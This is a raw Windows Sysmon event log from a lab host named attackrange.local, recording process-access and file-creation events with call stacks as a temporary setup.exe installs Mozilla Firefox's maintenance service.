C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\maintenanceservice.exe2021-01-18 13:59:52.396 10341000x800000000000000014995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
